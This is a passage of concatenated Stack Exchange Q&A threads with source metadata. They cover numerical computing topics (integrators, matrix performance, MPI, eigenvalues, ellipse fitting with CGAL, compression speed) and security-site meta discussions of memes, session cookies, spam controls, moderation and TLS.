That said, odeint does not have methods from either of these families , so it is not a good choice if you're looking for symplectic integrators. In Fortran, Hairer's site has a small set you can use . Mathematica has a few built in . The GSL ODE solvers have implicit RK Gaussian point integrators which IIRC are symplectic, but that's about the only reason to use the GSL methods. But the most comprehensive set of symplectic integrators can be found in DifferentialEquations.jl in Julia (recall this was used for the notebooks above). The list of available symplectic Runge-Kutta methods is found on this page and you'll notice that the implicit midpoint method is also symplectic (the implicit Runge-Kutta Trapezoid method is considered "almost symplectic" because it's reversible). Not only does it have the largest set of methods, but it's also open-source (you can see the code and its tests in a high-level language) and has a lot of benchmarks . A good introductory notebook for using it to solve physical problems is this tutorial notebook . But of course it's recommended you get started with the package through the first ODE tutorial . In general you can find a detailed analysis of numerical differential equation suites at this blog post . It's quite detailed but since it has to cover a lot of topics it does each at less detail than this, so feel free to ask for it to be expanded in any way. | {
"source": [
"https://scicomp.stackexchange.com/questions/29149",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/17869/"
]
} |
33,076 | I am at an international conference (ICIAM2019) about numerical methods and am surprised by the prevalence of applications directly relatable to arms research. examples: One award winner holds his talk about the mathematical problem of radar reconstruction/detection of moving objects, within his talk he describes the situation of a radar "platform" in 8km height using active radar detecting "moving subjects" at ground level, and he goes on about how magnificently tricky this problem is. people are presenting methods to accurately resolve and simulate shockwaves, and a quick google search reveals that they are working on "inertial confinement fusion". at after-conference dinner I sat next to people doing numerics in Los Alamos. I am doing my phd in applied math and numerical methods, and to be honest, I did not anticipate that the people receiving awards and are put on the large stages are doing arms research. I also noticed that the audience, which is presumably smarter than me, is applauding this work. I am wondering whether or not I would want to be part of this community, and if it is possible to build a career in applied math without directly or indirectly contributing to arms research. Is this something that is shrugged of? I am at a very early stage and would be very grateful for advice from the more experienced folks. | I completely agree with @Anton in his discussion. No matter what scientific computing work you do, if you publish it in some public journal or location, it can be used to build weapons or further military tech. I worked on missiles for a few years in a classified lab and I can tell you that I used my scientific computing background constantly in that environment. Using what I knew about solving differential equations or doing optimization and distributed computing were only a subset of the things I benefited from in that line of work and that doesn’t include other areas such as AI, computer science, controls, dynamical systems, etc. I can also tell you it was the norm in our lab to find papers and/or blog posts in these topics, when needed, to try and advance different algorithms for our purposes. So indirectly, anything you make public and available could be used. So you’ll never escape that. That said, I think it’s totally reasonable to never need to directly support arms research with your work. Some of my current colleagues have had big careers in scientific computing and they haven’t supported any arms research directly. | {
"source": [
"https://scicomp.stackexchange.com/questions/33076",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/28636/"
]
} |
34,213 | $A$ and $B$ are $n \times n$ matrices and $v$ is a vector with $n$ elements. $Av$ has $\approx 2n^2$ flops and $A+B$ has $n^2$ flops. Following this logic, $(A+B)v$ should be faster than $Av+Bv$ . Yet, when I run the following code in matlab A = rand(2000,2000);
B = rand(2000,2000);
v = rand(2000,1);
tic
D=zeros(size(A));
D = A;
for i =1:100
D = A + B;
(D)*v;
end
toc
tic
for i =1:100
(A*v+B*v);
end
toc The opposite is true. A v+B v is over twice as fast. Any explanations? | Except for code which does a significant number of floating-point operations on data that are held in cache, most floating-point intensive code is performance limited by memory bandwidth and cache capacity rather than by flops. $v$ and the products $Av$ and $Bv$ are all vectors of length 2000 (16K bytes in double precision), which will easily fit into a level 1 cache. The matrices $A$ and $B$ are 2000 by 2000 or about 32 megabytes in size. Your level 3 cache might be large enough to store one of these matrices if you've got a really good processor. Computing $Av$ requires reading 32 megabytes (for $A$ ) in from memory, reading in 16K bytes (for $v$ ) storing intermediate results in the L1 cache and eventually writing 16K bytes out to memory. Multiplying $Bv$ takes the same amount of work. Adding the two intermediate results to get the final result requires a trivial amount of work. That's a total of roughly 64 megabytes of reads and an insignificant number of writes. Computing $(A+B)$ requires reading 32 megabytes (for A) plus 32 megabytes (for B) from memory and writing 32 megabytes (for A+B) out. Then you have to do a single matrix-vector multiplication as above which involves reading 32 megabytes from memory (if you've got a big L3 cache, then perhaps this 32 megabytes is in that L3 cache.) That's a total of 96 megabytes of reads and 32 megabytes of writes. Thus there's twice as much memory traffic involved in computing this as $(A+B)v$ instead of $Av+Bv$ . Note that if you have to do many of these multiplications with different vectors $v$ but the same $A$ and $B$ , then it will become more efficient to compute $A+B$ once and reuse that matrix for the matrix-vector multiplications. | {
"source": [
"https://scicomp.stackexchange.com/questions/34213",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/26743/"
]
} |
34,915 | MPI is an interface which enables us to create multiple processes to be run on a single machine or on a cluster of machines, and enables message passing or in short sorts of communication between processes. I am sure they are other lots of specifications which enables multi processing to execute one bigger task. However, multi tasking and breaking a bigger task into smaller can also be done via threads. As far as I understand creating threads is much faster compared to processes and it does not need any message passing to communicate as shared memory is inherent. Why do you even need specifications like MPI and others for multi processing when you can achieve same effect using multi threaded programs ? | There is one real and one practical reason. First, MPI was developed at a time when machines had exactly one processor core and when we wanted to couple different machines. It is today used on clusters of tens of thousands of machines, each of which happens to have many cores but the point is that it's still separate machines. Now, a processor core on machine A can't access memory on machine B, and so there needs to be a way to transfer information between these processes -- that's what the message passing interface (MPI) fundamentally does: transfer data from one machine to another. You are entirely correct that, strictly speaking, you don't need MPI if you are working on one machine only. That of course limits how far you can scale your program (you will be able to use a few dozen threads, but not thousands since we don't have machines with that many cores). But more importantly, when you use threads, you now have a few dozen threads all accessing the same memory. It turns out to be conceptually very difficult to write codes that are efficient because historically we have been taught that the way to access shared data structures is to just use a mutex to access the information. That turns out to be efficient if you have 4 cores access the same memory, but not if you have 192: In that case, the ratio of time spent on computing information to time spent obtaining the mutex is just not very good any more. What one needs to do to address the issue is that every thread duplicates the read-write data structures during the main phase of the algorithm (so that they can be accessed without a mutex), followed by a reduction step. In other words, threads need to keep separate copies of data structures for efficiency. But that's not how we think when we program with threads, and so few implementations employ this strategy. On the other hand, that's what you need to do when you program with MPI because every process has its own memory space -- so MPI forces you to do what you should do with threads, and that's why using MPI often leads to quite efficient and scalable programs even when used in situations where threads could be used. | {
"source": [
"https://scicomp.stackexchange.com/questions/34915",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/35721/"
]
} |
35,187 | I am new to computer science and I was wondering whether half precision is supported by modern architecture in the same way as single or double precision is. I thought the 2008 revision of IEEE-754 standard introduced both quadruple and half precisions. | Intel support for IEEE float16 storage format Intel supports IEEE half as a storage type in processors since Ivy Bridge (2013). Storage type means you can get a memory/cache capacity/bandwidth advantage but the compute is done with single precision after converting to and from the IEEE half precision format. https://software.intel.com/content/www/us/en/develop/blogs/intel-half-precision-floating-point-format-conversion-instructions.html https://software.intel.com/content/www/us/en/develop/articles/performance-benefits-of-half-precision-floats.html Intel support for BFloat16 Intel has announced support for BF16 in Cooper Lake and Sapphire Rapids. https://software.intel.com/sites/default/files/managed/40/8b/bf16-hardware-numerics-definition-white-paper.pdf https://software.intel.com/sites/default/files/managed/c5/15/architecture-instruction-set-extensions-programming-reference.pdf https://software.intel.com/content/dam/develop/public/us/en/documents/architecture-instruction-set-extensions-programming-reference.pdf (the June 2020 update 319433-040 describes AMX BF16) I work for Intel. I’m citing official sources and will not comment on rumors etc. It is good to be curious about the relative merits of IEEE FP16 vs BF16. There is a lot of analysis of this topic, e.g. https://nhigham.com/2018/12/03/half-precision-arithmetic-fp16-versus-bfloat16/ . Non-Intel Hardware Support The following is information on other processors. Please verify with the vendors as necessary. http://on-demand.gputechconf.com/gtc/2017/presentation/s7676-piotr-luszcek-half-precision-bencharking-for-hpc.pdf lists the following hardware support: AMD - MI5, MI8, MI25 ARM - NEON VFP FP16 in V8.2-A NVIDIA - Pascal and Volta NVIDIA Ampere has FP16 support as well ( https://devblogs.nvidia.com/nvidia-ampere-architecture-in-depth/ ). | {
"source": [
"https://scicomp.stackexchange.com/questions/35187",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/36031/"
]
} |
38,873 | I came across this line in a class note I am reading where it discusses finding eigenvalues of matrices. In reality we don't go all the way with Arnoldi. We stop at a decent value of $k$ . Then the eigenvalues of the Hessenberg matrix $H_k$ are (usually) good approximations to extreme eigenvalues of $A$ . Trefethen and Bau emphasize for non-symmetric $A$ that we may not want eigenvalues of $A$ in the first place! When they are badly conditioned, this led Trefethen and Embree to the theory of pseudospectra. Why is this the case? I understand that for symmetric matrices, there are many nice properties of eigenvalues. For example the eigenvalues of a real symmetric matrix are real. SVD comes from the eigenvalues of $A^TA$ which is symmetric, etc. But why are we so confident that we usually don't need to find the eigenvalues of a non-symmetric matrix? Is it purely because of the nice properties of symmetric matrices that make us tend to formulate our problems that way? If someone can explain or point to where Trefethen and Bau explain it, that would be great. I have that book, but I can't find the explanation in the relevant chapters I went through. | Stability under perturbations Let $E$ be a perturbation such that $\|E\| \leq \varepsilon$ . If $A$ is symmetric, then the eigenvalues of $A+E$ are at a distance of at most $\varepsilon$ from those of $A$ . ( Bauer-Fike Theorem .) If $A$ is non-symmetric, then the eigenvalues of $A+E$ can be much further away. Example: start with a Jordan block of size $n$ , and perturb the $(1,n)$ entry to $\varepsilon$ ; then the eigenvalues are the $n$ th complex roots of $\varepsilon$ , which have magnitude $\varepsilon^{1/n}$ . If $\varepsilon=10^{-16}$ and $n=16$ , an incredibly tiny perturbation changed the eigenvalues by $0.1$ . Instead, if $A$ is non-symmetric, then the $\delta$ -pseudospectrum of $A+E$ is at a distance $\varepsilon$ from that of $A$ (follows from the definition). So, the point is, how sure are you that the numbers in your matrix $A$ are correct? What if that measurement is only accurate to the third decimal digit? What about that tiny $2^{-52}$ error that you make when you truncate the coefficient 2/3 to a double? Those small perturbations affect your computed eigenvalues. There is little point in computing a number if you don't know how accurate it is in the first place. Or, worse, if you know from the start that it is inaccurate. Pseudospectra capture nicely this concept that the true location of the eigenvalues is uncertain, for non-symmetric matrices, and provide a concept analogous to eigenvalues that is stable under perturbations. | {
"source": [
"https://scicomp.stackexchange.com/questions/38873",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1418/"
]
} |
38,932 | I've always had this question in mind (even if it may sound vague), but in my numerical analysis courses we've always learned how to analyze and optimize code. However, since most linear algebra libraries (i.e. LAPACK, BLAS, etc.) have been continuously optimized by professional developers since the 1980s, I'm questioning what the purpose of having us write down algorithms and run them is. For example, we've had to write the QR iteration algorithm in MATLAB when there's already a built-in function ( eig ). Are there special cases where these built-in functions are vunerable for numerical instability where custom algorithms would outperform them? Update : I want to thank you all for your interesting answers and comments I have read them all. I also realized the beauty of this very narrow field of mathematics that has profound application in our work. The amount of effort that these mathematicians and computer scientist have invested in making these codes more powerful have made it beautiful for us (the ones who are learning about their theories) so that we can admire them while studying and knowing when to use these optimized built-in functions. While we write down a 15 line of codes to compute the Householder QR decomposition of some matrix $A$ , I can only wonder how many lines of codes the built in function qr() has (probably in the 100s) so that it can serve us best in our computations in real life applications. | Although LAPACK has some incredibly optimized code, it can still be worth it to write your own version in a few cases. The most important reason (and the reason they make you do it in your course). It's a great learning experience. You will never fully understand something like the QR algorithm (which is actually incredibly complicated to get the details right) unless you spend some time implementing it. A lot of the skills you pick up will translate when you write other numerical codes. A lot of the code is contributed by the researchers who develop the algorithms and it takes a lot of effort. Researchers are usually evaluated on how many papers they publish, not the code they write for libraries, so there can be a lack of incentive for researchers to contribute these codes. As an example, it was only last year that an optimized version of the QZ algorithm was contributed, although a paper was published on it in 2006. LAPACK code needs to be robust and general. This is mostly important for the small scale routines. I'll talk about DLARTG as an example. That routine calculates a Givens rotation. It has a lot of scaling, safety checks and exceptions to make sure it is always accurate for all the input you could ever give it. If you know that for your application, these safety checks will not be necessary or you don't need the strong accuracy guarantees, you can achieve faster results. | {
"source": [
"https://scicomp.stackexchange.com/questions/38932",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/40046/"
]
} |
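As a hedged illustration of the DLARTG point above (this is not LAPACK's actual code, just a sketch of why the scaling and safety checks matter): a textbook Givens rotation computed as r = sqrt(f*f + g*g) silently overflows for large inputs, while a guarded version stays accurate.
import math
def givens_naive(f, g):
    r = math.sqrt(f * f + g * g)       # f*f or g*g can overflow or underflow
    return f / r, g / r                # (c, s)
def givens_safe(f, g):
    if g == 0.0:
        return 1.0, 0.0
    if f == 0.0:
        return 0.0, math.copysign(1.0, g)
    r = math.hypot(f, g)               # hypot rescales internally to avoid overflow
    return f / r, g / r
f, g = 1e200, 3e200
print(givens_naive(f, g))              # (0.0, 0.0): f*f overflowed to inf, so the result is garbage
print(givens_safe(f, g))               # approximately (0.3162, 0.9487)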
40,494 | I have a set of points that resembles more of an ellipse than a circle. I implemented the optimization formulation below and the solution gives a circle. I tried with various initial values, still to no avail. Have I overlooked or mistaken something? $$ \begin{align}
\min_{r_{maj},r_{min}} \quad & \pi r_{maj}r_{min} \\
s.t. \quad & \left(\frac{x_i-x_c}{r_{maj}}\right)^2 + \left(\frac{y_i-y_c}{r_{min}}\right)^2 \leq 1 \quad \forall\;i
\end{align} $$ $r_{maj},r_{min}$ : major and minor radius $(x_c,y_c)$ : ellipse centre the red cross is the 'ellipse' centre obtained from the optimization result. | Theory The 1997 paper " Smallest Enclosing Ellipses -- Fast and Exact " by Gärtner and Schönherr addresses this question. The same authors provide a C++ implementation in their 1998 paper " Smallest Enclosing Ellipses -- An Exact and Generic Implementation in C++ ". The paper's 150 pages long, but, fortunately for us, the venerable CGAL library implements the algorithm as described here . However, CGAL only provides the general equation for the ellipse, so some massaging is necessary to convert the general equation to the canonical equation and, from there, to get a parametric equation suitable for plotting. All this is included in the implementation below. Using WebPlotDigitizer to extract your data gives: -2.024226110363392 5.01315585320002
1.9892328398384915 3.0400196291391692
-0.0269179004037694 1.980973446537659
-0.987886944818305 -0.9505049812548929
4.9851951547779265 -1.9398893695943187 Fitting this using the program below gives: a = 2.47438
b = 5.42919
cx = 0.767976
cy = 0.792924
theta = 0.784877 We can then plot this with gnuplot set parametric
plot "points" pt 7 ps 2, [0:2*pi] a*cos(t)*cos(theta) - b*sin(t)*sin(theta) + cx, a*cos(t)*sin(theta) + b*sin(t)*cos(theta) + cy lw 2
to get
#include <CGAL/Cartesian.h>
#include <CGAL/Min_ellipse_2.h>
#include <CGAL/Min_ellipse_2_traits_2.h>
#include <CGAL/Exact_rational.h>
#include <cassert>
#include <cmath>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>
typedef CGAL::Exact_rational NT;
typedef CGAL::Cartesian<NT> K;
typedef CGAL::Point_2<K> Point;
typedef CGAL::Min_ellipse_2_traits_2<K> Traits;
typedef CGAL::Min_ellipse_2<Traits> Min_ellipse;
struct EllipseCanonicalEquation {
double semimajor; // Length of semi-major axis
double semiminor; // Length of semi-minor axis
double cx; // x-coordinate of center
double cy; // y-coordinate of center
double theta; // Rotation angle
};
std::vector<Point> read_points_from_file(const std::string &filename){
std::vector<Point> ret;
std::ifstream fin(filename);
float x,y;
while(fin>>x>>y){
std::cout<<x<<" "<<y<<std::endl;
ret.emplace_back(x, y);
}
return ret;
}
// Uses "Smallest Enclosing Ellipses -- An Exact and Generic Implementation in C++"
// under the hood.
EllipseCanonicalEquation get_min_area_ellipse_from_points(const std::vector<Point> &pts){
// Compute minimum ellipse using randomization for speed
Min_ellipse me2(pts.data(), pts.data()+pts.size(), true);
std::cout << "done." << std::endl;
// If it's degenerate, the ellipse is a line or a point
assert(!me2.is_degenerate());
// Get coefficients for the equation
// r*x^2 + s*y^2 + t*x*y + u*x + v*y + w = 0
double r, s, t, u, v, w;
me2.ellipse().double_coefficients(r, s, t, u, v, w);
// Convert from CGAL's coefficients to Wikipedia's coefficients
// A*x^2 + B*x*y + C*y^2 + D*x + E*y + F = 0
const double A = r;
const double B = t;
const double C = s;
const double D = u;
const double E = v;
const double F = w;
// Get the canonical form parameters
// Using equations from https://en.wikipedia.org/wiki/Ellipse#General_ellipse
const auto a = -std::sqrt(2*(A*E*E+C*D*D-B*D*E+(B*B-4*A*C)*F)*((A+C)+std::sqrt((A-C)*(A-C)+B*B)))/(B*B-4*A*C);
const auto b = -std::sqrt(2*(A*E*E+C*D*D-B*D*E+(B*B-4*A*C)*F)*((A+C)-std::sqrt((A-C)*(A-C)+B*B)))/(B*B-4*A*C);
const auto cx = (2*C*D-B*E)/(B*B-4*A*C);
const auto cy = (2*A*E-B*D)/(B*B-4*A*C);
double theta;
if(B!=0){
theta = std::atan(1/B*(C-A-std::sqrt((A-C)*(A-C)+B*B)));
} else if(A<C){
theta = 0;
} else { //A>C
theta = M_PI/2; // 90 degrees when B == 0 and A > C (major axis along y)
}
return EllipseCanonicalEquation{a, b, cx, cy, theta};
}
int main(int argc, char** argv){
if(argc!=2){
std::cerr<<"Provide name of input containing a list of x,y points"<<std::endl;
std::cerr<<"Syntax: "<<argv[0]<<" <Filename>"<<std::endl;
return -1;
}
const auto pts = read_points_from_file(argv[1]);
const auto eq = get_min_area_ellipse_from_points(pts);
// Convert canonical equation for rotated ellipse to parametric based on:
// https://math.stackexchange.com/a/2647450/14493
std::cout << "Ellipse has the parametric equation " << std::endl;
std::cout << "x(t) = a*cos(t)*cos(theta) - b*sin(t)*sin(theta) + cx"<<std::endl;
std::cout << "y(t) = a*cos(t)*sin(theta) + b*sin(t)*cos(theta) + cy"<<std::endl;
std::cout << "with" << std::endl;
std::cout << "a = " << eq.semimajor << std::endl;
std::cout << "b = " << eq.semiminor << std::endl;
std::cout << "cx = " << eq.cx << std::endl;
std::cout << "cy = " << eq.cy << std::endl;
std::cout << "theta = " << eq.theta << std::endl;
return 0;
} | {
"source": [
"https://scicomp.stackexchange.com/questions/40494",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/41855/"
]
} |
41,760 | I've come across compression algorithms and tried creating a simple run-length encoding algorithm, but when I searched for other algorithms I was shocked to learn that some of them can process thousands of megabits per second. How is this possible? I tried compressing a 1 GB text file and it took quite some time. How is this achievable, or am I missing something here? I can't code well in C, so I created my simple program in Python; are these speeds only attainable in C? | The short answer to your question is this: If your goal is speed (as it is in typical applications of data compression), then (i) you need to choose a programming language that allows you to write algorithms close to the hardware, and (ii) you will spend a very large amount of time benchmarking and profiling your software to find where it is slow, and then fix these places by using better algorithms and better ways of implementing these algorithms. The authors of the compression packages you mention have not chosen to use magic to achieve the speed shown in the table. They have just put a large effort (probably years of work) into making their software fast. | {
"source": [
"https://scicomp.stackexchange.com/questions/41760",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/43685/"
]
} |
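A rough sketch of the "benchmark and profile" advice in the answer above (illustrative only; the payload and the pure-Python encoder are assumptions, not taken from the question): timing and profiling a naive run-length encoder shows that the per-byte interpreter loop, rather than the algorithm itself, is what makes Python slow here.
import cProfile
import time
def rle_encode(data):
    out = bytearray()
    i = 0
    while i < len(data):
        run = 1
        while i + run < len(data) and data[i + run] == data[i] and run < 255:
            run += 1
        out += bytes((run, data[i]))
        i += run
    return bytes(out)
payload = b"abcabcabc" * 100_000 + b"x" * 100_000   # about 1 MB of mixed data
t0 = time.perf_counter()
rle_encode(payload)
print(len(payload) / (time.perf_counter() - t0) / 1e6, "MB/s")
cProfile.run("rle_encode(payload)")   # the profile shows almost all time spent in the Python-level loop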
880 | There are memes common to the whole of Stack Exchange . But after spending some time in The DMZ it becomes evident that Information Security has its own memes (e.g. rory). I therefore propose that this space be used to document the memes endemic to Information Security's culture. One meme per answer, please. | Meme: Don't roll your own. (AKA: The first rule of cryptography.) Originator: Unknown. One of the most infamous uses on IT Security is by D.W., here . This meme is also related to / a synonym of "Don't be a Dave!" Cultural Height: TBD Background: Everyone seems to want to write their own ciphers, or create their own security mechanisms. Unfortunately, this usually doesn't end well. As such, the phrase "don't roll your own" has become a frequent staple of IT Security advice, as well as on other boards (e.g. Crypto SE) and across the entire information security community. "Anyone can invent an encryption algorithm they themselves can't break; it's much harder to invent one that no one else can break" - Bruce Schneier | {
"source": [
"https://security.meta.stackexchange.com/questions/880",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/5501/"
]
} |
1,447 | Last year, Security.SE took part in the Winter Bash Hat Dash , where users earned "hats" for their gravatars by completing certain tasks (analogous to badges): Certain actions would trigger the user receiving a hat, which their gravatar could then "wear". For example, editing a post would yield an editor-themed hat (fedora with pen) to the editor. Here's the rundown of last year's: The event ran from 19 December 2012 to 4 January 2013. Users had their entire hat collection on http://winterbash2013.stackexchange.com . Individual users who didn’t want to participate, didn’t want to see hats, and/or are generally anti-hat had an "I hate hats" option available. The only visual change to the site itself was the presence of the hats and the "I hate hats" button in the footer. We need to let Stack Exchange know by end of November 2013, so vote on one of the two answers below . | Yes! Gimme dem hats! I want all sorts of winter themed nonsense! | {
"source": [
"https://security.meta.stackexchange.com/questions/1447",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/485/"
]
} |
2,043 | Suppose a question was asked 4 months ago and the OP was satisfied by a given available answer: Is there any benefit to adding my own answer to the OP's question 4 months later? | Yes, if you have another way to answer the question posed, that you think has some merits, you should post it. The answers are not just for the OP. If the OP was satisfied, good for them; but think of the people who will be looking for that question later (depending on the question, there may be hundreds or thousands of them... or hundreds of thousands). Users generally overestimate the importance of the "accepted" checkmark. Just a few hours ago, I came across an answer that was accepted and upvoted, but offered a poor solution for the problem posed. Under it, there was a later answer which started off with a half-apology "I know this is resolved, but... " and proceeded to present the correct, canonical solution to the problem. | {
"source": [
"https://security.meta.stackexchange.com/questions/2043",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/-1/"
]
} |
2,151 | I'm logged in to security.stackexchange and I'm not using https to browse the site. Does this mean that the site is vulnerable to session hijacking? I assume that it's not, but I don't get how the session is protected if the connection is not secure. | The session cookies (or at least, what looks like session cookies to me) acct and sgt are both served with the HTTPOnly flag. This means that client side Javascript can't access them, making it hard to hijack the session using things like XSS vulnerabilities or similar. This does not protect against an attacker who can intercept your traffic, but in that case, it is possible to access the site with HTTPS enabled - just go to https://security.stackexchange.com I don't know why it doesn't default to the secure version, but there is relatively little sensitive data being transferred after the initial sign in (almost everything is publicly available, after all), so it may be that the cache advantages of not encrypting outweigh the security benefits. | {
"source": [
"https://security.meta.stackexchange.com/questions/2151",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/9068/"
]
} |
2,159 | A site as big as stackoverflow must certainly attract a lot of spammers and bots. Hence, I find it strange that they are not using captcha, either to create a new account or to post a new answer as a guest. Are they using hidden techniques like honeypots, or do they just expect the community to flag all the spam and delete it? | As stated by Jeff Atwood himself , StackExchange uses several techniques to reduce spam. captcha script detection heuristics and "honeypots" user flagging (spam / offensive / moderator attention) auto-removal of some items based on certain flag thresholds being met active moderator participation throughout the day to look at moderator flagged items They are also using captchas , which are triggered under some specific conditions. I have to complete one from time to time. | {
"source": [
"https://security.meta.stackexchange.com/questions/2159",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/50051/"
]
} |
2,171 | I'm honestly being serious. It's just not on this forum either. Why do people put in the time and effort to post a question they can simply google the answer for? Posting their question on a forum like this takes more time than it would to google the answer, so why do people do it? | Google-searching is a rarefying skill. It seems to be a question of generation. Let me put some historical context. In days of my youth (say, 25 years ago, in the late 1980s and early 1990s), when you wanted to learn about something, you went to the public library and looked it up in an encyclopaedia. You also scanned the books on display to see if there was one about your research subject. If you wanted more data you had to invest time and money to order specialized books in a bookshop. All this learning was very active. Then, from the mid-1990s onward, the Web began to grow and accumulate data, and search engines appeared (remember Altavista ?). People who were used to the library-searching began to use search engines in about the same way: to locate and pinpoint sought-after information. In the early 2000s (2001, to be precise), Wikipedia appeared and the searching process began to change. The aggregation of information in Wikipedia meant that it became a relatively natural entry point. If you wanted to learn about a subject, you began by reading the Wikipedia article, and possibly followed some of the internal and external links; there is little googling involved in such a process. This also forced search engines to somehow change their stance: while in 1995 you wanted to learn who was the 6th emperor of the Qing dynasty(*), in 2005 you go to Google to know when the nearest restaurant opens. This is still information, but not the same usage context. Then social networks appeared. They completely reversed the way people use the Internet. This is especially apparent in young people (say, 20 years old or less), who spend inordinate amounts of time connected to Facebook and its ilk. They use the Internet not by going forth and exploring the information jungle with the help of search engines or even Wikipedia; they simple receive a lot of the stuff from their extended network of relations. A youth who grew up to the Internet through social networks has hundreds of Internet-friends, and has barely enough time to simply sift through all the data that they push unto him. For him, Google-searching is an almost alien concept. When he really wants to learn about a specific subject, he asks: he pushes a message so that his Internet-friends, not an anonymous robot like Google, gives him the answer. Different site, same people: when social network users come to StackExchange, they keep their Internet usage habits: they don't look things up in Google; they ask. Many do not even look up other questions in StackExchange, which is why there are many duplicates. The amazing thing is how fast this transformation occurred: in two decades, search engines transitioned from "bleeding edge technology" to "tool for dinosaurs". (Of course I am talking generalities here; there are still people who use search engines, and even people who go to public libraries. And there are good reasons to ask questions as well. But my point is that the googling reflex is not as widespread as it used to be.) (*) It is Qianlong , or Daoguang if you do not count the first two dynasty members who ruled before the conquest of China from the Ming. 
But you could get that information by simply typing "6th qing emperor" into Google and reading the first two hits, which are Wikipedia entries. | {
"source": [
"https://security.meta.stackexchange.com/questions/2171",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/55201/"
]
} |
2,288 | The question: Authenticating a user via SMS elicited a very interesting comment from the OP after a very new user (<20 days) suggested the question was off-topic. I don't mean to kick a hornet's nest, but the incessant arguing on StackExchange about what is or isn't an acceptable post is mind-boggling to me. I get that we don't want people obviously trolling for opinions and instigating flame wars, but should we really be getting up in arms about a serious, productive question where a real person is getting real help about a real issue? Isn't that the whole point of this site? The rules are there to help protect that, not to get in the way.. – John Chrysostom Whether or not he's right about this specific case, the fact that the network is eliciting this kind of rant from contributing members is not good. You see it several times a week where a new user posts a low-quality first post, gets torn apart for it, and never comes back. Is that really how we want this community run? Is it appropriate to refine our Off-Topic policy so that it catches fewer legitimate questions and is more friendly to first-time posters? Is it appropriate to flag / remove overly harsh comments on first-time posts and replace them with something softer / more encouraging? | This question did strike me as especially hard over on SO, where new and/or low rep users regularly get downvoted and closed very fast. Over here on Sec.SE, because there is way less traffic, the problem is not as maddening as on SO, but it is still a problem we as a community should try and take care of. In fact, on SO there is a "SOCVR" team that attempts to improve questions and be helpful to new users, trying to educate them as to how they may get better answers faster. (Side note: SOCVR do more than just that, but let's focus on the "help OP" part right now) Nonetheless, it might be a good approach to leave useful comments when downvoting and/or close-voting (as schroeder does regularly; there is a user script for auto-comments, which makes that easier for recurring problems), and to have a chat room with experienced users who try to explain the problems with questions to OPs in a more direct way, helping to shape the questions into form. This way, new users may still get ranted away (because, hey, it's still the internet), but there are people to help them understand the problems and tell them not to give up after their first shot. As I was a room member on SOCVR and I think the idea is pretty good, I just founded and linked the proposed chat room and am happy to have more people there. While the team on SO has a broader approach to moderation, I'll quote here some parts of their internal rules that may apply here too: Work with the OP to get their post into shape; most content has some value. De-escalate in case of disagreement. A post is to be actively handled by only one member of the room. (We don't need 4 members all leaving witty statements in the comments or in chat.) Moderate the post, not the user. (keep the discussion on the merits of the post, not on behavior of the user) If this catches anyone's interest, I suggest the chat can discuss how things go from there. | {
"source": [
"https://security.meta.stackexchange.com/questions/2288",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/61443/"
]
} |
2,315 | The title is perhaps more inflammatory than the reality, but I can alter it later. Concerning this answer: https://security.stackexchange.com/a/120775/6253 to the question "What should you do if you catch ransomware mid-operation?" There has been a lot of controversy and a ton of flags. I am choosing to keep the answer in place. It is the only answer that suggests that interfering with the encryption process might damage the data The author discloses the conflict of interest From a technical standpoint, it has validity. From a conflict of interest perspective, all cards are on the table. People have the info they need to make an informed decision. This specific malware author is not benefitting from this specific instance: the topic and answer are generic, it's not about this author's own malware. So, there is only potential tangential personal benefit to the author from people following the advice. If the answer had more direct benefit to the author, then things would be different. | We should judge each answer on its own and whether it provides valid advice. The fact that the author is a malware developer is irrelevant. If the advice is good, then upvote it, if not, then downvote it. | {
"source": [
"https://security.meta.stackexchange.com/questions/2315",
"https://security.meta.stackexchange.com",
"https://security.meta.stackexchange.com/users/6253/"
]
} |
5 | From the view of somebody offering a web application, when somebody connects with TLS (https) to our service and submits the correct authentication data, is it safe to transmit all sensitive data over this line, or can it be that there is still eavesdropping? This question was IT Security Question of the Week . Read the Jul 29, 2011 blog entry for more details or submit your own Question of the Week. | It's important to understand what SSL does and does not do, especially since this is a very common source of misunderstanding. It encrypts the channel It applies integrity checking It provides authentication So, the quick answer should be: "yes, it is secure enough to transmit sensitive data". However, things are not that simple. The newest versions of SSL - version 3, or better yet: TLS, even TLS 1.2, are definitely better than previous versions. E.g. SSL 2 was relatively easy to MITM (Man in the middle). So, first it depends on protocol version. Both the channel encryption and the integrity checking are configurable in the protocol, i.e. you can choose which algorithms to use (cipher suite). Obviously, if you're using RSA1024/SHA512 you're much better off... However, SSL even supports a mode of NULL encryption - i.e. no encryption at all, just wrapping the requests up to tunnel over the SSL protocol. I.e., no protection. (This is configurable both at the client and the server; the selected cipher suite is the first matching set according to the configured order). Authentication in SSL has two modes: server-authentication only, and mutual authentication (client certificates). In both cases, the security ensured by the cryptographic certificates is definitely strong enough, however the validity of the actual authentication is only as good as your validity checks: Do you even bother checking the certificate? Do you ensure its validity? Trust chain? Who issued it? Etc. This last point re authentication is a lot easier in web applications , wherein the client can easily view the server's certificate, the lock icon is easily viewable, etc. With Web Services , you usually need to be more explicit in checking its validity (depending on your choice of platform). Note that this same point has tripped up so many mobile apps - even if the app developer remembered to use only TLS between the phone and the server, if the app doesn't explicitly verify the certificates then the TLS is broken. While there are some mostly theoretical attacks on the cryptography of SSL, from my PoV it's still plenty strong enough for almost all purposes, and will be for a long time. What is actually done with the data at the other end? E.g. if it's super-sensitive, or even credit card data, you don't want that in the browser's cache, or history, etc. Cookies (and thus authentication) can be shared between a 